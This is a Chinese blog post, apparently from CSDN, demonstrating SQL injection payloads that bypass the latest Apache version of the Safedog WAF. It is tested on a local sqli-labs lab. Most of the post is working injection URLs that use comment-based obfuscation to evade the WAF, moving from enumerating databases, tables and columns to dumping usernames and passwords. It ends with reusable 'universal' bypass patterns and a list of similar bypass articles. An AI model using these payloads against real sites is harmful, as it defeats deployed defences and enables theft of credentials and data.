SQL注入-安全狗apache最新版绕过

最新推荐文章于 2023-02-28 16:55:20 发布
最新推荐文章于 2023-02-28 16:55:20 发布
阅读量1.6k 收藏 12
点赞数 2
分类专栏: 免杀和bypass 文章标签: 安全 乌鸦安全 sql注入 bypass 安全狗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csdnmmd/article/details/122699983
版权

 微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

01 背景知识

现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。

tips:本文需要您提前掌握一定的基础知识!

02 环境配置

Windows 10主机

phpstudy2018

sqli-labs靶场

安全狗apache4.0.30255

当前版本是最新版安全狗(截止2021.05.17)

3. fuzz绕过字符

单独的from 不拦截 schema.schemata也不拦截, information_schema拦截,from information拦截,from/*//--/*/information不拦截查库:select schema_name from information_schema.schemata查表:select table_name from information_schema.tables where table_schema='security'查字段:select column_name from information_schema.columns where table_name='users'查字段的值:select username,password from security.users

口算一个有效字符,非常重要!!!

%20/*//--/*/

接下来的操作都是在此基础上实现的

3.1 order by 语句

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  order by 1 --+

 拦截

最新版本的特征和次新版本还不是太一样的:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order /*//--/*/ by 10 --+

bypass成功

3.2  union select语句

查看显示报错的位置:(这是apache次新版绕过的方法)

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*//--/*/ select 1,2, 3 --+

那在这里了就尝试下新的句子:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*//--/*/     /*!--+/*%0aselect/*!1,2,3*/  --+

绕过成功

3.3 database()关键字

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*//--/*/ select 1,2, database() --+

拦截

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*//--/*/     /*!--+/*%0aselect/*!1,2,*/database /*//--/*/ ()  --+

正常

3.4 获取其他的库

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*//--/*/ select 1,2, group_concat(schema_name) from information_schema.schemata --+

拦截

这里经过多次fuzz,后来发现狗狗对information_schema.schemata 拦截比较厉害,所以这里可以采用这样的模式(这是次新版绕过的方法)

http://127.0.0.1sqli-labs-master/Less-1/?id=-1' union /*//--/*/ select 1,2, group_concat(schema_name) from information_schema.  /*//--/*/ schemata --+

还是被拦截

那在这里还是无法绕过,因此这里需要引入在3.5版本里面的绕过from的一个方法

/*!06447%23%0afrom*/

因此在这里可以使用(这是次新版本绕过的方法)

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*//--/*/ select 1,2, group_concat(schema_name) from information_schema.  /*//--/*/ schemata --+

但是在这,不行

那就换下:(其实这里就是对union select 进行了更新)

union select  1,2,3 转换为: union /*!--+/*%0aselect/*!1,2,*/3

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union   /*!--+/*%0aselect/*!1,2,*/  group_concat(schema_name)    /*!from*/    /*!--+/*%0ainformation_schema./*!schemata*/ --+

3.5 一次性获取所有的表

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(table_name)    /*!from*/     /*!--+/*%0ainformation_schema./*!tables*/ where table_schema='security' --+

3.6 一次性获取所有的字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(column_name)    /*!from*/     /*!--+/*%0ainformation_schema./*!columns*/ where table_name='users' --+
 

 

3.7 一次性获取字段里面的值
 

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(concat_ws(0x7e,username, password))     /*!from*/    security.users --+
 

 

4. 总结
 

口算yyds !!!
 

这里比较重要的点:
 

万能符号:
 

union select  -->
 

union/*//--/*/select
 

 

union select 1,2,3  --> 
 

union /*!--+/*%0aselect/*!1,2,*/ 3
 

 

 微信公众号:乌鸦安全
 

 
 

扫取二维码获取更多信息!

                

        

    

  


            

                    
            


    


                



	

		

			

				
					
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入

				
			

			

				

					weixin_42125192的博客
				

				

					02-05
					
					340
					
				

			

		

		

			
				
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...

			
		

	



                

            
              



	

		

			

				
					
SQL注入绕过安全狗的waf防火墙,这一篇就够了,8k文案超详细

					
最新发布

				
			

			

				

					xt350488的博客
				

				

					07-16
					
					5325
					
				

			

		

		

			
				
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和绕过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式绕过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。

			
		

	



              


  
              

                


	

		

			

				
					
最新版安全狗绕过(2020.5.4)

				
			

			

				

					weixin_42751423的博客
				

				

					05-04
					
					3225
					
				

			

		

		

			
				
环境:
phpstudy2018(mysql+apache)
安全狗v4.0专业版
sqllabs靶场

访问正常

报错,根据报错可看出数据被带入执行,即存在注入
再试试 and 1=1
嚯?安全狗。。。。。

拦截
这里直接
用  /**/   代替   空格
用  /!xxxx/    代替  xxxx   绕过

如果不明白可以看看这两篇文章,关于MySQL注释的解释
https://ww...

			
		

	





	

		

			

				
					
Safedog 4.0 bypass绕过

				
			

			

				

					Keepb1ue的博客
				

				

					02-28
					
					4232
					
				

			

		

		

			
				
Safedog 4.0 bypass绕过

			
		

	



		

			
		



	

		

			

				
					
sql注入绕过最新apache安全狗(环境:phpstudy下sqllibs)

				
			

			

				

					m0_61398945的博客
				

				

					08-04
					
					1085
					
				

			

		

		

			
				
sql注入绕过安全狗

			
		

	





	

		

			

				
					
php网站安全狗绕过,网站安全狗最新版绕过测试

				
			

			

				

					weixin_33279554的博客
				

				

					03-10
					
					226
					
				

			

		

		

			
				
测试时间:2014.10.21测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。测试详细步骤:1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注入测试:Defaulthtt...

			
		

	





	

		

			

				
					
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1

				
			

			

				

					08-03
				

			

		

		

			
				
在这个特定的情况下,问题涉及的是安全狗apache主程序版本v4.0.23137的绕过策略。  描述中提到的“绕过1”意味着存在一个针对该版本的安全狗防护措施的规避方法,攻击者可以利用这个漏洞来执行未授权的SQL查询。以下...

			
		

	





	

		

			

				
					
SQL注入绕过安全狗V4.0(Apache)及POC利用

				
			

			

				

					weixin_43815032的博客
				

				

					10-11
					
					771
					
				

			

		

		

			
				
0x01 资源准备:
    
    
      
    
    python3.7:python-3.7.4-amd64.exe
    安全狗安装包:safedogwzApache.exe (截至10月2号官网上下的apche v4.0最新版)
    phpStutdy集成环境:phpStudy_64.7z
    
      
    
    需要...

			
		

	





	

		

			

				
					
网站安全狗Apache版 v4.0.18089

				
			

			

				

					10-30
				

			

		

		

			
				
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖网马/木马扫描、防SQL注入、防盗链、防黑链、防CC攻击、下载线程...7、修复最新SQL注入绕过漏洞;网站安全狗Windows-

			
		

	





	

		

			

				
					
【经验总结】SQL注入Bypass安全狗360主机卫士

				
			

			

				

					TeamsSix 的 优快云 空间
				

				

					01-05
					
					961
					
				

			

		

		

			
				
0x00 前言
这类的文章已经是比较多了,本文也主要是作为学习笔记来记录,主要是记录一下我在学习 SQL 注入 Bypass 的过程,同时前人的不少绕过方法已经失效了,所以这里也是记录一下最新规则的一些绕过方法。
0x01 环境搭建
测试环境:Win7 + Apache + MySQL 5.7.26 + PHP 5.5.45
测试代码:
<?php
if ($_GET['id']==null...

			
		

	





	

		

			

				
					
mysql特性绕过安全狗_绕过安全狗新版进行SQL注入

				
			

			

				

					weixin_39641738的博客
				

				

					02-28
					
					239
					
				

			

		

		

			
				
前言在圈子见到某师傅过了安全狗然后注入,然后自己手痒也搭了个环境进行测试。期间搭建环境各种坑….不过后面还是有个不错的结果的正文首先我是用phpstudy+安全狗4.0搭建的环境一开始找不到apache名称,按照网上的来整也不行(一堆重复的沙雕)解决方法:以管理员权限运行cmd,进入apache/bin目录httpd -k install -n apache2.4以管理员权限运行cmd,进入mys...

			
		

	





	

		

			

				
					
「网络安全SQL注入bypass最新版安全狗

				
			

			

				

					iqifenxia的博客
				

				

					11-13
					
					366
					
				

			

		

		

			
				
 



  安全狗又偷偷摸摸更新了

  【网络安全学习】

  之前安全狗就像没开发完一样,简单内联就过去了,但是现在的安全狗摇身一变,变得稳重了起来。

  就连报错界面都变成了大人的模样。

  



  看这架势,不好过啊

  



  首先 and 内敛注释依旧是可以过的,看来安全狗并没有太过关注and,可能是觉得后面的规则比较牛,知道有注入也没用?

  



  然后是order by ,从这里开始,事情就变得微妙了起来

  



  猜测规则是order by 组合强规则,意思

			
		

	





	

		

			

				
					
最新版安全狗(V4.0.2665) sql 注入绕过

				
			

			

				

					qq_41891666的博客
				

				

					12-01
					
					2228
					
				

			

		

		

			
				
前言:
之前做测试的时候看见waf 就一脸懵逼,于是决定学一学waf bypass 的技术,这篇文章是关于bypass 安全狗来实现,看了网上的一些文章,然后自己搭了环境,动手实践一下,毕竟纸上得来终觉浅,绝知此事要躬行。
0x00 搭建安全狗环境
准备环境:
虚拟机 win 7 sp1
安全狗最新版本 V4.0.2665
phpstudy v8.1
坑:
安装安全狗的时候,

这个服务名怎么填都不对,网上的一些教程说把phpstudy 先修改为系统服务,但是问题是那是老版本的phpstudy ,现在使用的

			
		

	





	

		

			

				
					
SQL注入-绕过安全狗

				
			

			

				

					LJH1999ZN的博客
				

				

					02-15
					
					5222
					
				

			

		

		

			
				
绕过安全狗的常见四种方式





id=1'/*!44444order*/ /*!44444by*/3--+






			
		

	





	

		

			

				
					
SQL注入绕过安全狗

				
			

			

				

					qq_45462249的博客
				

				

					07-15
					
					1410
					
				

			

		

		

			
				
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具,WAF检测一般分为两种,一种白名单,一种黑名单。白名单相对于黑名单来说,更加安全,但是白名单由于设置的比较严格,有时会影响用户的正常访问,所以WAF还是用黑名单的比较多。后面接数据库版本号时,如果自身版本号大于等于字符数,就会将注释中的内容执行,否则就会当做注释来处理。查询这些分别注意union和select连接,from和表连接,还有database()括号的连接,需要用到以上方法结合起来。...

			
		

	





	

		

			

				
					
sql注入绕过安全狗

				
			

			

				

					weixin_48776804的博客
				

				

					02-15
					
					727
					
				

			

		

		

			
				
sql注入安全狗

			
		

	





	

		

			

				
					
安全狗SQL注入绕过

				
			

			

				

					qq_38675102的博客
				

				

					02-09
					
					3035
					
				

			

		

		

			
				
安全狗waf绕过

			
		

	





	

		

			

				
					
绕过安全狗拦截的SQL注入

				
			

			

				

					记录学习,一起进步
				

				

					02-26
					
					3071
					
				

			

		

		

			
				
绕过安全狗拦截的SQL注入

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 5

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值